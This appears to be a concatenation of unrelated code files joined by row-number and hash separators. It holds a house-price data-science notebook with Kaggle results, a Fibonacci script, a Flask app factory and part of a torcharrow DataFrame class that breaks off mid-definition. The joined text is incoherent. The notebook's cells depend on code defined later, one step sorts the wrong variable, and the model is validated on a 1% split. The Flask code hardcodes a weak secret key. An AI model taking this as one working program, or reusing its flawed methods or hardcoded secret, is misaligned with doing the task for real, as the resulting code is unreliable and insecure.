# But one interesting thing to note here is that Typical Garage quality is distributed nicely among all the SalePrices and most of the data points are in the typical garage quality bracket. This tells us that once the Garage Quality reaches a level of Typical, the customer does not focus much on it. He will look for other features. But, if the garage quality is below typical, like Poor or Fair, it may affect the price of the house severely and negatively.
#
# This tells us the subtlety or the nuance of the effect of Garage Quality on SalePrice.
# In[581]:
# code to generate Plot 3
# Scatter plot of Neighborhood v/s the year the houses were built there.
plt.scatter(train_houses['YearBuilt'], train_houses['Neighborhood'],color='saddlebrown')
plt.xlabel('Year Built')
plt.ylabel('Neighborhood')
plt.show()
# What interesting properties does Plot 3 reveal?
#
# Plot 3 reveals interesting things about the year the neighborhood was developed in the city of Ames. We can find out the recently developed neighborhoods and the neighborhoods which were developed quite early.
#
# For example, Old Town neighborhood has construction started quite early in 1800s. Blmngtn is a new neighborhood which started with first house being constructed in around 2000s.
#
# There are some areas in which the construction started and continued for a few years or decades and then stopped for decades and then restarted again.
#
# It would be interesting to know the reasons behind these gaps. And the reasons behind those gaps could lead to some interesting analysis.
# In[580]:
# code to generate Plot 4
# Bar graph of neighborhood v/s mean SalePrice
# (re-reads the training CSV into a second frame used again in Part 5).
new_data = pd.read_csv('C:/Fall2019/DSF/Assignment2/Data/train.csv')
new_data.Neighborhood.head()
groupby_neighborhood = new_data[['Neighborhood', 'SalePrice']]
neighborhoods = new_data.Neighborhood.unique().tolist()
#neighborhoods_list = neighborhoods.values().tolist()
groupby_neighborhood.shape
# Mean SalePrice per neighborhood, sorted ascending for the bar chart.
ng = groupby_neighborhood.groupby('Neighborhood').mean()
ng = ng.sort_values(by='SalePrice')
print(ng.head())
plot1 = (ng).plot(kind='bar', color='darkorange')
fig= plt.figure(figsize=(6,3))
# What interesting properties does Plot 4 reveal?
#
# This line chart reveals the relation between the Neighborhood and the Sale Price.
# In[609]:
# code to generate Plot 5
# Line Graph of MSSubClass v/s SalePrice
MSSubClasses = train_houses.MSSubClass.unique().tolist()
MSSub = train_houses[['MSSubClass', 'SalePrice']]
# Mean SalePrice per dwelling class, sorted ascending for the line chart.
mg = MSSub.groupby('MSSubClass').mean()
mg = mg.sort_values(by='SalePrice')
print(mg.head())
plot1 = (mg).plot(color='darkorange')
plt.xlabel('MSSubClass')
plt.ylabel('SalePrice')
plt.show()
# What interesting properties does Plot 5 reveal?
#
# This plot shows the average SalePrice for a group of MSSubClass.
# ## Part 3 - Handcrafted Scoring Function
# In[274]:
# Scoring function: weight each desirability-related column by its correlation
# with SalePrice, then score every house on a 0-100 scale.

# Correlation between the ordinal quality/condition columns and SalePrice
# (ordinal grades mapped onto 1-5 so Pearson correlation applies).
ordinal_saleprice = train_houses[['ExterQual', 'ExterCond','BsmtQual', 'BsmtCond', 'HeatingQC', 'KitchenQual', 'FireplaceQu' , 'GarageQual',
                                 'GarageCond', 'SalePrice']]
mapper = {'Ex':5, 'Gd':4, 'TA':3, 'Fa':2, 'Po':1}
new_ordinal_saleprice = ordinal_saleprice.replace(mapper)
new_ordinal_saleprice.fillna(0, inplace=True)
corr1 = new_ordinal_saleprice.corr()

house_score_columns = ['OverallQual', 'YearBuilt', 'TotalBsmtSF', 'GrLivArea', 'GarageArea','TotRmsAbvGrd','ExterQual','KitchenQual','SalePrice']
house_score_exterqual_ordinal = train_houses[house_score_columns].replace(mapper)
house_score_exterqual_ordinal.fillna(0, inplace=True)
house_score_exterqual_ordinal.head()
corr = house_score_exterqual_ordinal.corr()

corr_saleprice_values = corr['SalePrice'].tolist()
corr_saleprice_values.pop()  # drop SalePrice's self-correlation (always 1.0)
# Normalize the correlations into weights summing to 1.
# (The running total is no longer held in a variable named `sum`,
# which shadowed the builtin.)
weight_total = sum(corr_saleprice_values)
weights = [value / weight_total for value in corr_saleprice_values]

house_score_saleprice_dropped = house_score_exterqual_ordinal.drop(columns=['SalePrice'])

# Maximum achievable weighted score, used to normalise scores onto 0-100.
max_columns_list = house_score_exterqual_ordinal.max().tolist()
max_columns_list.pop()  # remove the SalePrice column's maximum
max_score = sum(col_max * w for col_max, w in zip(max_columns_list, weights))

# Weighted score for each house, as a percentage of the maximum possible.
scores = []
for _, house in house_score_saleprice_dropped.iterrows():
    raw = sum(value * w for value, w in zip(house.tolist(), weights))
    scores.append(raw * 100 / max_score)

house_score_exterqual_ordinal['score'] = scores
house_score_sorted = house_score_exterqual_ordinal.sort_values(by=['score'],ascending=False)
house_score_sorted.insert(0, 'Id', train_houses[['Id']])
display(house_score_sorted.head(10))
print("Ten most desirable houses")
Id_SalePrice_Score = house_score_sorted[['Id', 'SalePrice', 'score']]
display(Id_SalePrice_Score.head(10))
# What is the ten most desirable houses?
#
# The IDs of the ten most desirable houses ( as can be seen in the table above with all column values ) are:
#
# Id SalePrice score
# 1299 160000 99.978223
# 524 184750 70.691236
# 1183 745000 64.011294
# 692 755000 63.264750
# 497 430000 58.221686
# 1170 625000 54.814496
# 441 555000 52.445614
# 1374 466500 52.016900
# 1354 410000 51.697533
# 799 485000 51.397749
# In[272]:
# Fetching the 10 least desirable houses
# (ascending sort of the same per-house score computed above)
house_score_sorted_ascending = house_score_exterqual_ordinal.sort_values(by=['score'])
house_score_sorted_ascending.insert(0, 'Id', train_houses[['Id']])
display(house_score_sorted_ascending.head(10))
print("Ten least desirable houses")
# What is the ten least desirable houses?
#
# The IDs of the ten least desirable houses ( as can be seen in the table above with all column values ) are:
#
# Id SalePrice score
#
# 534 39300 12.971542
# 1101 60000 17.025584
# 1219 80500 17.241422
# 711 52000 17.557500
# 1322 72500 17.691305
# 637 60000 18.008895
# 529 86000 18.203606
# 1324 82500 18.366807
# 706 55000 18.472395
# 1036 84000 18.680118
# Describe your scoring function and how well you think it worked.
#
# The notion of desirability was attached to the sense of cost.
# So, for the scoring function, I used the correlation matrix that I prepared in question 1 and saw which correlations with 'Sale Price' were the most significant among all the variables. I selected those variables to be used in the scoring function. For negative correlations, I was not getting significant enough correlation with 'Sale Price'. The highest negative correlation was around -0.42. Hence, I decided not to use the negative correlations.
#
# The variables which were selected based on the correlation with 'Sale Price' are:
#
# Variable Correlation with SalePrice
#
# 1) OverallQual 0.790982
# 2) YearBuilt 0.522897
# 3) TotalBsmtSF 0.613581
# 4) GrLivArea 0.708624
# 5) GarageArea 0.623431
# 6) TotRmsAbvGrd 0.533723
# 7) ExterQual 0.682639
# 8) KitchenQual 0.659600
#
# The last two variables 'ExterQual' and 'KitchenQual' were ordinal variables and converted to numerical values by mapping the following:
# {'Excellent': 5, 'Good' : 4,'Typical' : 3, 'Fair':2, 'Poor':1, 'NA':0}
#
# The scoring functions calculates a weight to be given to each variable depending upon the extent of its correlation with the SalePrice. It then calculates the total score for a particular row by multiplying the weights of the column with the column value.
#
# The maximum possible score is calculated and then each score is divided by the maximum possible score and multiplied by a 100 to obtain a normalized score out of 100.
#
# If you have a look at the table for the most desirable houses, the top desirable house (ie ID: 1299 sits comfortably at the top with a normalized score of 99.97 and the second position is at 70.69
# This is because of the excellent values of the variables of that particular house. The rest of the 9 houses are the ones who have the highest SalePrice among the whole data. So, I would say that the scoring function works pretty well.
#
# If you have a look at the 10 least desirable houses, they have terrible values of the variables and these things are eventually reflected in their ultimate price. The Sale Price of the house are among the lowest in the whole dataset.
# In[278]:
# The distribution of the scoring function can be plotted as below
# Most of our houses have a score of 20-60 and there are very few houses which are above 60.
sns.distplot(house_score_sorted_ascending['score'])
# ## Part 4 - Pairwise Distance Function
# Here, we need to find homes that are similar to each other. This means that homes that are of similar make, similar exterior material, similar lot shape, building type, house style and many more properties of the house. We will ignore the attributes of the house such as quality of garage, overall quality, fireplace quality as such variables are not dependent on the neighborhood. Same quality of the houses can be found in different neighborhoods. We will only consider the variables that are related to physical properties of the house.
#
#
# For assigning distances between a pair of categorical variable values, we will first label encode the categorical variables and then one hot encode it.
# In[642]:
# code for distance function
# Select the nominal, physical-property columns; one-hot encoding (done in
# Part 5) makes Euclidean distance meaningful between categorical values.
cat_columns = {'MSSubClass', 'MSZoning', 'Street', 'Condition1', 'Condition2', 'BldgType','HouseStyle','RoofStyle','RoofMatl','Exterior1st','Exterior2nd','Foundation','Heating','Electrical','GarageType'}
dist_houses = train_houses[['Id', 'Neighborhood']]
train_houses_dist = train_houses[['Id', 'Neighborhood', 'MSSubClass', 'MSZoning', 'Street', 'Condition1', 'Condition2', 'BldgType','HouseStyle','RoofStyle','RoofMatl','Exterior1st','Exterior2nd','Foundation','Heating','Electrical','GarageType']]
train_houses_dist = train_houses_dist.dropna(how='any')
display(train_houses_dist.shape)
train_houses_dist.head()
train_houses_dist_ohe = train_houses_dist[['MSSubClass', 'MSZoning', 'Street', 'Condition1', 'Condition2', 'BldgType','HouseStyle','RoofStyle','RoofMatl','Exterior1st','Exterior2nd','Foundation','Heating','Electrical','GarageType']]

# Numeric columns used for the pairwise distance itself.
distance_cols = ['LotFrontage', 'LotArea', 'YearBuilt', 'GrLivArea','GarageArea']
# fillna on a fresh copy instead of inplace on a slice of train_houses --
# the inplace form triggers pandas' SettingWithCopyWarning and may silently
# fail to modify the data.
distance_data = train_houses[distance_cols].fillna(0)

from sklearn.metrics.pairwise import euclidean_distances

# Calculating the Euclidian distances between two rows in the data
eu_dist = euclidean_distances(distance_data, distance_data)
# Normalised distances: distance of each distance-matrix row from the origin
# (zeros matrix built with numpy instead of a nested list comprehension).
origin = np.zeros_like(eu_dist)
eu_dist_norm = euclidean_distances(eu_dist, origin)
print(eu_dist_norm)
# In[626]:
print(eu_dist)
# How well does the distance function work? When does it do well/badly?
#
# I have calculated the distance matrix between some of the variables. The notion of distance is attached to the neighborhood. Houses in the same neighborhood are similar and hence tend to have a smaller distance between them.
# ## Part 5 - Clustering
# In[647]:
#code for clustering and visualization
display(train_houses_dist_ohe.head())
# One-hot encode the nominal columns selected in Part 4.
ohe_dist_houses = pd.get_dummies(train_houses_dist_ohe)
ohe_dist_houses.shape
ohe_dist_houses_with_ids_neighbors = pd.concat([dist_houses, ohe_dist_houses], axis=1)
# Agglomerative clustering
cluster = AgglomerativeClustering(n_clusters=15, affinity='euclidean', linkage='ward')
display(cluster.fit_predict(distance_data))
# k means clustering
# (rows of the precomputed distance matrix are used as feature vectors)
kmeans = KMeans(n_clusters=15)
kmeans.fit(eu_dist)
y_kmeans = kmeans.predict(eu_dist)
plt.scatter(eu_dist[:,0], eu_dist[:,1], c=y_kmeans, s=1000,cmap='viridis')
centers = kmeans.cluster_centers_
plt.scatter(centers[:, 0], centers[:, 1], c='black', alpha=0.5);
# Re-plot mean SalePrice per neighborhood for visual comparison with the clusters.
new_data_1 = pd.read_csv('C:/Fall2019/DSF/Assignment2/Data/train.csv')
groupby_neighborhood_1 = new_data[['Neighborhood', 'SalePrice']]
neighborhoods_1 = new_data_1.Neighborhood.unique().tolist()
ng1 = groupby_neighborhood.groupby('Neighborhood').mean()
# NOTE(review): the next line sorts `ng` (from Part 2), not `ng1` -- both hold
# the same grouping here, but `ng1.sort_values` was presumably intended.
ng1 = ng.sort_values(by='SalePrice')
plot1 = (ng1).plot(color='brown')
fig= plt.figure(figsize=(6,3))
# How well do the clusters reflect neighborhood boundaries? Write a discussion on what your clusters capture and how well they work.
#
# I have applied agglomerative and k means clustering. The boundaries were reflected more clearly in the k means clustering algorithm.
# I have taken the number of clusters to be 15 for optimal performance of k means clustering. The number of possible neighborhoods is 25. Hence, all boundaries of neighborhood may not be reflected clearly here.
#
# The plot above is highly reflective of 'Neighborhood' and the mean 'SalePrice'.
# So, the points lying around 0-50000 are the ones which have that SalePrice in that range and the cheapest neighborhood is reflected in those points.
#
# The two plots above can be compared and the points lying cloesest to the origin are the points in the neighborhood closest to the origin. And so on.
# ## Part 6 - Linear Regression
# In[472]:
# code for linear regression
# We will use those variables for predicting the sale price which have the highest correlation with the SalePrice variable.
# NOTE(review): this cell depends on `house_score_exterqual_ordinal_neighbors`
# and `neighbor_mapper`, which are defined in a *later* cell (In[439]) -- the
# notebook cells were executed out of order.
# Fit on log(SalePrice) to stabilise the target's skew.
house_score_exterqual_ordinal_neighbors['logSalePrice'] = np.log(house_score_exterqual_ordinal_neighbors['SalePrice'])
X = house_score_exterqual_ordinal_neighbors[['OverallQual', 'YearBuilt' , 'GrLivArea', 'GarageArea','ExterQual','KitchenQual', 'Neighborhood']]
y = house_score_exterqual_ordinal_neighbors[['logSalePrice']]
X_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.01,random_state=0)
regr = linear_model.LinearRegression()
regr.fit(X_train, y_train)
y_pred = regr.predict(X_test)
accuracy = regr.score(X_test, y_test)
#print(accuracy)
# Prints the r2 score for the linear regression model
print(r2_score(y_test, y_pred))
# Score the Kaggle test set with the fitted model and write a submission file.
test_file = pd.read_csv('C:/Fall2019/DSF/Assignment2/Data/test.csv')
test_file_variables = test_file[['OverallQual', 'YearBuilt' , 'GrLivArea', 'GarageArea','ExterQual','KitchenQual','Neighborhood']]
mapper = {'Ex':5, 'Gd':4, 'TA':3, 'Fa':2, 'Po':1}
test_file_variables_ordinal = test_file_variables.replace(mapper)
test_file_variables_ordinal_neighbor = test_file_variables_ordinal.replace(neighbor_mapper)
test_file_variables_ordinal_neighbor.fillna(0, inplace=True)
test_file_predict = regr.predict(test_file_variables_ordinal_neighbor)
sampleSubmission = pd.read_csv("C:/Fall2019/DSF/Assignment2/Data/sample_submission.csv")
# Model was fit on log(SalePrice); invert with exp before writing the submission.
sampleSubmission['SalePrice'] = np.exp(test_file_predict)
sampleSubmission.to_csv("C:/Fall2019/DSF/Assignment2/Data/sampleSubmission1.csv")
sampleSubmission.shape
# In[439]:
# Converting the categorical nominal variable 'Neighborhood' to ordinal variable according to the mean of the SalePrice
neighborhood = train_houses[['Neighborhood','SalePrice']]
neighborGroupBy = neighborhood.groupby(by='Neighborhood').mean()
#print(neighborGroupBy)
neighborGroupBy.sort_values(by='SalePrice')
# Ranks derived from the sorted group means above: 1 = cheapest neighborhood,
# 25 = most expensive.
neighbor_mapper = {'MeadowV':1,
'IDOTRR':2,
'BrDale':3,
'BrkSide':4,
'Edwards':5,
'OldTown':6,
'Sawyer':7,
'Blueste':8,
'SWISU':9,
'NPkVill':10,
'NAmes':11,
'Mitchel':12,
'SawyerW':13,
'NWAmes':14,
'Gilbert':15,
'Blmngtn':16,
'CollgCr':17,
'Crawfor':18,
'ClearCr':19,
'Somerst':20,
'Veenker':21,
'Timber':22,
'StoneBr':23,
'NridgHt':24,
'NoRidge':25}
# Add the raw Neighborhood column, then replace names with their ranks.
house_score_exterqual_ordinal['Neighborhood'] = train_houses[['Neighborhood']]
house_score_exterqual_ordinal_neighbors = house_score_exterqual_ordinal.replace(neighbor_mapper)
display(house_score_exterqual_ordinal_neighbors.head())
# How well/badly does it work? Which are the most important variables?
#
# So, I experimented with many variables. Mostly numerical variables which has a significant correlation with the SalePrice.
# In the end, I got to know the significance of the neighborhood with the SalePrice as this is true in most parts of the world. For example, prices of houses in Manhattan will definitely be higher than that of houses in Stony Brook!
# So, I included neighborhood in the linear regression model for prediction.
# ## Part 7 - External Dataset
# In[598]:
# code to import external dataset and test
# FRED "IAHOWN" series: Iowa homeownership rate by year.
ownership_rate = pd.read_csv('C:/Fall2019/DSF/Assignment2/Data/IAHOWN.csv')
# Reduce the full date to just the year so it can be joined on YrSold.
ownership_rate['DATE'] = pd.to_datetime(ownership_rate['DATE'])
ownership_rate['DATE'] = ownership_rate['DATE'].dt.year
display(ownership_rate.head())
house_with_yr_sold = house_score_exterqual_ordinal_neighbors
house_with_yr_sold['YrSold'] = train_houses['YrSold']
# Join each sale to the ownership rate of the year it was sold.
merged = pd.merge(house_with_yr_sold, ownership_rate, left_on = 'YrSold', right_on = 'DATE')
display(merged.head())
X_merged = merged[['OverallQual', 'YearBuilt' , 'GrLivArea', 'GarageArea','ExterQual','KitchenQual', 'Neighborhood', 'IAHOWN']]
y_merged = merged[['logSalePrice']]
X_merged_train,X_merged_test,y_merged_train,y_merged_test=train_test_split(X_merged,y_merged,test_size=0.01,random_state=0)
regr_merged = linear_model.LinearRegression()
regr_merged.fit(X_merged_train, y_merged_train)
y_pred_merged = regr_merged.predict(X_merged_test)
#print(accuracy)
# Prints the r2 score for the linear regression model
print("Accuracy after merging the external data: ")
print(r2_score(y_merged_test, y_pred_merged))
print('')
print("Accuracy before merging the external data: ")
print('0.92675')
# Describe the dataset and whether this data helps with prediction.
#
# There is a dataset of Homeownership Rate for the state of Iowa, which I found on FRED Economic Data website (https://fred.stlouisfed.org)
#
# This dataset talks about the rate of ownership of the houses in the state of Iowa for a particular year starting from the year of 1984 up until 2018.
#
# I integrated this dataset in my train data to check whether the ownership rate of the houses affected the sale price or not.
# Ideally, the homeownership rate should affect the SalePrice of the house as more the ownership rate of the year, more the people are buying the houses and more the demand and SalePrice should increase proportionally.
#
# In the external dataset, first I extracted the year from the date provided.
# Then, I merged the two tables based on year provided in the external dataset and the year the house was sold in the original data which makes sense because we would check the home ownership rate only while buying the house.
#
# As we can see from the code above that the accuracy of the simple linear regression model decreases from approx. 0.92 to 0.86 after we merge the external data with the original data, we would not be using it for further prediction as this will only become a hindrance for us in predicting good values.
#
# So, this data clearly does not help with the prediction.
# Create a redundant data frame for doing permutation tests and add all the permutation columns in it
permutation_df = house_score_exterqual_ordinal_neighbors
# Meaningless variables to be included for permutation tests = LandContour, LotConfig, LandSlope, Condition1, Condition2
permutation_df['LandContour'] = train_houses['LandContour']
permutation_df['LotConfig'] = train_houses['LotConfig']
permutation_df['LandSlope'] = train_houses['LandSlope']
permutation_df['Condition1'] = train_houses['Condition1']
permutation_df['Condition2'] = train_houses['Condition2']
permutation_df.fillna(0,inplace=True)
le_LandContour = preprocessing.LabelEncoder()
le_LotConfig = preprocessing.LabelEncoder()
le_LandSlope = preprocessing.LabelEncoder()
le_Condition1 = preprocessing.LabelEncoder()
le_Condition2 = preprocessing.LabelEncoder()
permutation_df['LotConfig'] = le_LotConfig.fit_transform(permutation_df['LotConfig'])
permutation_df['LandContour'] = le_LandContour.fit_transform(permutation_df['LandContour'])
permutation_df['LandSlope'] = le_LandSlope.fit_transform(permutation_df['LandSlope'])
permutation_df['Condition1'] = le_Condition1.fit_transform(permutation_df['Condition1'])
permutation_df['Condition2'] = le_Condition2.fit_transform(permutation_df['Condition1'])
# In[532]:
# TODO: code for all permutation tests
# Variables selected for p test:
# Meaningful
# 'OverallQual',
# 'GrLivArea',
# 'GarageArea',
# 'ExterQual',
# 'KitchenQual',
# Meaningless
# 'LandContour',
# 'LotConfig',
# 'LandSlope',
# 'Condition1',
# 'Condition2'
# A simple function to return random permutation of the data
def permute(df):
    """Return a copy of *df* with every column independently shuffled.

    The caller's frame is left untouched; shuffling happens on the copy.
    """
    shuffled = df.copy()
    # np.random.shuffle permutes each column (Series) in place when applied
    # column-wise; apply()'s return value is discarded on purpose.
    shuffled.apply(np.random.shuffle)
    return shuffled
permutation_columns = ['OverallQual', 'GrLivArea', 'GarageArea', 'ExterQual', 'KitchenQual','LandContour', 'LotConfig', 'LandSlope', 'Condition1', 'Condition2']
X_whole = house_score_exterqual_ordinal_neighbors[['OverallQual','GrLivArea', 'GarageArea','ExterQual','KitchenQual','LandContour', 'LotConfig', 'LandSlope', 'Condition1', 'Condition2']]
y_whole = house_score_exterqual_ordinal_neighbors[['logSalePrice']]
# iterate through all the columns selected for permutation testing
# Prepare the training data for that single column only by taking 100 random permutations
# Perform simple linear regression for that column
# Calculate the Root of Mean Square Error (RMSE)
# Append the 100 values of RMSE in a list
for col in permutation_columns:
    rmse_perm = []
    print("Column: ", col)
    # 100 null-hypothesis runs: both X and y are shuffled before fitting.
    for _ in range(100):
        X_perm = permute(X_whole[[col]])
        y_perm = permute(y_whole)
        X_train_perm,X_test_perm,y_train_perm,y_test_perm=train_test_split(X_perm,y_perm,test_size=0.25,random_state=0)
        regr_perm = linear_model.LinearRegression()
        regr_perm.fit(X_train_perm, y_train_perm)
        y_pred_perm = regr_perm.predict(X_test_perm)
        rms = np.sqrt(mean_squared_error(y_test_perm, y_pred_perm))
        rmse_perm.append(rms)
    # Train the model with the real values of the data
    X_train_real,X_test_real,y_train_real,y_test_real = train_test_split(X_whole[[col]],y_whole,test_size=0.01,random_state=0)
    # with sklearn
    regr_real = linear_model.LinearRegression()
    regr_real.fit(X_train_real, y_train_real)
    y_pred_real = regr_real.predict(X_test_real)
    rms_real = np.sqrt(mean_squared_error(y_test_real, y_pred_real))
    # append the real result to the rmse list
    rmse_perm.append(rms_real)
    # Plot the graphs for 10 different columns RMSEs and highlight the RMSE of the real data
    # rmse_perm[100] is the just-appended real RMSE (indices 0-99 are permuted runs).
    n, bins, patches = plt.hist(rmse_perm, 20, density=True, facecolor='g', alpha=0.75, edgecolor='black')
    ylim = plt.ylim()
    plt.plot(2 * [rmse_perm[100]], ylim, '--g', linewidth=3,
             label='Real Score')
    plt.ylim(ylim)
    plt.legend()
    plt.xlabel('Score')
    # NOTE(review): the second xlabel call overrides the first; probably only one was intended.
    plt.xlabel('RMSE')
    plt.ylabel('Frequency')
    plt.title('RMSEs of permutation test')
    plt.grid(True)
    plt.show()
    # Get the pvalue from the permutation scores
    # NOTE(review): this computes the fraction of runs with RMSE *below* the real
    # score (rank in the sorted list / 101); confirm this matches the intended
    # one-sided p-value definition.
    rmse_perm.sort()
    pos = rmse_perm.index(rms_real)
    pvalue = pos/101
    print("PValue with column :", col)
    pvalue = round(pvalue, 3)
    print(pvalue)
    # Added to print new lines between plots
    print('')
    print('')
    print('')
# Permutation test results description
#
#
#
# The first 3 meaningful variables such as OverallQual, GarageArea , GrLivArea have very low pvalues almost equal to 0.00 which means that they are highly correlated to the SalePrice and hence it is statistically significant
#
# The next 2 variables, i.e. KitchenQual and ExterQual, which we considered to be quite meaningful, ended up having p-values of 0.505 and 0.347, which means that they may not be as statistically significant as we thought them to be.
#
# The meaningless variables have very high pvalues of 0.99 which means that our intuition was right and those variables are actually statistically insignificant and meaningless with respect to the prediction of the SalePrice.
# Describe the results.
# XGBoost Model
# In[ ]:
# XGBoost Model
# Gradient-boosted trees; hyperparameters hand-tuned (ranges noted inline).
model = XGBRegressor(n_estimators = 1000, #100-1000
                    learning_rate = 0.01, #increase while decreasing n_trees
                    max_depth = 5, #increase incrementally by 1; default 6, increasing can lead to overfit
                    colsample_bytree = 0.3, # 0.3 to 0.8
                    gamma = 0) #0, 1 or 5
model.fit(X_train, y_train)
xgb_preds = model.predict(X_test) #store the predictions for xgbregressor
# Held-out RMSE, measured on log(SalePrice).
rmse = np.sqrt(mean_squared_error(y_test, xgb_preds))
print(rmse)
test_file_predict2 = model.predict(test_file_variables_ordinal_neighbor)
sampleSubmission2 = pd.read_csv("C:/Fall2019/DSF/Assignment2/Data/sample_submission.csv")
# Undo the log transform before writing the submission file.
sampleSubmission2['SalePrice'] = np.exp(test_file_predict2)
sampleSubmission2.to_csv("C:/Fall2019/DSF/Assignment2/Data/sampleSubmission2.csv")
sampleSubmission2.shape
print(len(xgb_preds))
# Kernel Ridge Regression Model
# In[ ]:
# Kernel Ridge Regression:
# Default (linear) kernel with L2 regularization strength alpha=1.0.
clf = KernelRidge(alpha=1.0)
clf.fit(X_train, y_train)
test_file_predict3 = clf.predict(test_file_variables_ordinal_neighbor)
sampleSubmission3 = pd.read_csv("C:/Fall2019/DSF/Assignment2/Data/sample_submission.csv")
# Predictions are log prices; exponentiate for the submission.
sampleSubmission3['SalePrice'] = np.exp(test_file_predict3)
sampleSubmission3.to_csv("C:/Fall2019/DSF/Assignment2/Data/sampleSubmission3.csv")
sampleSubmission3.shape
print(len(test_file_predict3))
# Lasso Regression
# In[ ]:
# Lasso Regression
# L1-regularized linear model (alpha=0.1) as another baseline.
clf2 = linear_model.Lasso(alpha=0.1)
clf2.fit(X_train, y_train)
test_file_predict4 = clf2.predict(test_file_variables_ordinal_neighbor)
sampleSubmission4 = pd.read_csv("C:/Fall2019/DSF/Assignment2/Data/sample_submission.csv")
# Predictions are log prices; exponentiate for the submission.
sampleSubmission4['SalePrice'] = np.exp(test_file_predict4)
sampleSubmission4.to_csv("C:/Fall2019/DSF/Assignment2/Data/sampleSubmission4.csv")
# Comparison of Different Models
#
# 1) Linear Regression Model: (done in 6th question)
#
# This model did not perform very well as expected. Linear Regression model just finds the linear relationship between the independent variables and the dependent variable. When I uploaded the results to Kaggle, I was getting a score of 0.1924
#
# 2) XGBoost Model:
#
# This model improved the model significantly and gave the Kaggle score of 0.1349 and a rank of 2234. This was the best performing model out of all the four models.
#
# 3) Kernel Ridge Regression:
#
# This model did not give much accuracy as compared to other models. It gave Kaggle score of 0.3675.
#
# 4) Lasso Regression:
#
# This model performed on the same lines as that of baseline Linear Regression and gave the accuracy of around 0.2138
#
# Hence, XGBoost gives the best result for the prediction of the test task.
#
# ## Part 9 - Final Result
# Report the rank, score, number of entries, for your highest rank. Include a snapshot of your best score on the leaderboard as confirmation. Be sure to provide a link to your Kaggle profile. Make sure to include a screenshot of your ranking. Make sure your profile includes your face and affiliation with SBU.
# Kaggle Link: https://www.kaggle.com/rutvikparekh
# Highest Rank: 2234
# Score: 0.13495
# Number of entries: 10
# The screenshot of my ranking is uploaded on Google Drive.
#
# https://drive.google.com/file/d/1Yqk5MNLMGGpiv13kAPbWUPgAyGLjYzNB/view?usp=sharing
|
986,921 | faebb708ca7059ffdcb57938b2ef45fc4bdb7662 |
def fibo(n):
    """Return the n-th Fibonacci number (fibo(0) == 0, fibo(1) == 1)."""
    if n < 2:
        return n
    prev, curr = 0, 1
    # Each step advances the pair (F(k-1), F(k)) to (F(k), F(k+1)).
    for _ in range(n - 1):
        prev, curr = curr, prev + curr
    return curr
# Read n from stdin and print the n-th Fibonacci number.
print(fibo(int(input())))
|
986,922 | 207116f6cd08a7262fd4e90cb99bbaff5aa50dba | #!/usr/bin/python3
#coding:utf-8
"""
主程序文件
"""
from flask import Flask
def create_app():
    """Application factory: build the Flask app and mount every blueprint."""
    app = Flask(__name__)
    app.config['SECRET_KEY'] = 'hello-world-2016'
    # Blueprints are imported inside the factory (as in the original layout),
    # keeping module import time free of side effects.
    from controller.home import home as home_blueprint
    from controller.ghdn.home import ghdn as ghdn_blueprint
    from controller.ghdn.drug import drug as drug_blueprint
    from controller.ghdn.network import network as network_blueprint
    from controller.ghdn.gene import gene as gene_blueprint
    from controller.backstage.login import login as login_blueprint
    # Register each blueprint under its URL prefix.
    mounts = [
        (home_blueprint, '/home'),
        (ghdn_blueprint, '/ghdn'),
        (drug_blueprint, '/drug'),
        (network_blueprint, '/network'),
        (gene_blueprint, '/gene'),
        (login_blueprint, '/login'),
    ]
    for blueprint, prefix in mounts:
        app.register_blueprint(blueprint, url_prefix=prefix)
    return app
|
986,923 | ec63bf9d7db9caafa0e1c3ebc82a2487e762731a | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
from __future__ import annotations
import array as ar
import functools
from abc import abstractmethod
from dataclasses import dataclass
from typing import (
Any,
Callable,
Dict,
Iterable,
List,
Literal,
Mapping,
Optional,
Sequence,
Tuple,
Union,
cast,
Iterable,
Iterator,
OrderedDict,
)
import numpy as np
import torcharrow as ta
import torcharrow._torcharrow as velox
import torcharrow.dtypes as dt
import torcharrow.pytorch as pytorch
from tabulate import tabulate
from torcharrow.dispatcher import Dispatcher
from torcharrow.expression import eval_expression, expression
from torcharrow.icolumn import IColumn
from torcharrow.idataframe import IDataFrame
from torcharrow.scope import Scope
from torcharrow.trace import trace, traceproperty
from .column import ColumnFromVelox
from .typing import get_velox_type
# assumes that these have been imported already:
# from .inumerical_column import INumericalColumn
# from .istring_column import IStringColumn
# from .imap_column import IMapColumn
# from .ilist_column import IListColumn
# ------------------------------------------------------------------------------
# DataFrame Factory with default scope and device
# -----------------------------------------------------------------------------
# DataFrames aka (StructColumns, can be nested as StructColumns:-)
# Shorthand for what DataFrame factories accept: a mapping of column name ->
# data, a sequence of rows, an explicit dtype, or None.
DataOrDTypeOrNone = Union[Mapping, Sequence, dt.DType, Literal[None]]
class DataFrameCpu(ColumnFromVelox, IDataFrame):
"""Dataframe, ordered dict of typed columns of the same length"""
    def __init__(self, device, dtype, data):
        """Build a struct-typed Velox column from a dict of equal-length columns.

        *data* maps field name -> ColumnFromVelox; *dtype* must be a dt.Struct
        describing those fields.
        """
        assert dt.is_struct(dtype)
        IDataFrame.__init__(self, device, dtype)
        self._data = velox.Column(get_velox_type(dtype))
        assert isinstance(data, dict)
        first = True
        for key, value in data.items():
            assert isinstance(value, ColumnFromVelox)
            # Every column after the first must match the accumulated length.
            assert first or len(value) == len(self._data)
            first = False
            # TODO: using a dict for field type lookup
            (field_dtype,) = (f.dtype for f in self.dtype.fields if f.name == key)
            col = value
            idx = self._data.type().get_child_idx(key)
            self._data.set_child(idx, col._data)
            self._data.set_length(len(col))
        # Mutable (append protocol) until _finalize() flips this flag.
        self._finialized = False
@property
def _mask(self) -> List[bool]:
return [self._getmask(i) for i in range(len(self))]
# Any _full requires no further type changes..
@staticmethod
def _full(device, data: Dict[str, ColumnFromVelox], dtype=None, mask=None):
assert mask is None # TODO: remove mask parameter in _FullColumn
cols = data.values() # TODO: also allow data to be a single Velox RowColumn
assert all(isinstance(c, ColumnFromVelox) for c in data.values())
ct = 0
if len(data) > 0:
ct = len(list(cols)[0])
if not all(len(c) == ct for c in cols):
ValueError(f"length of all columns must be the same (e.g {ct})")
inferred_dtype = dt.Struct([dt.Field(n, c.dtype) for n, c in data.items()])
if dtype is None:
dtype = inferred_dtype
else:
# TODO this must be weakened (to deal with nulls, etc)...
if dtype != inferred_dtype:
pass
# raise TypeError(f'type of data {inferred_dtype} and given type {dtype} must be the same')
return DataFrameCpu(device, dtype, data)
    # Any _empty must be followed by a _finalize; no other ops are allowed during this time
    @staticmethod
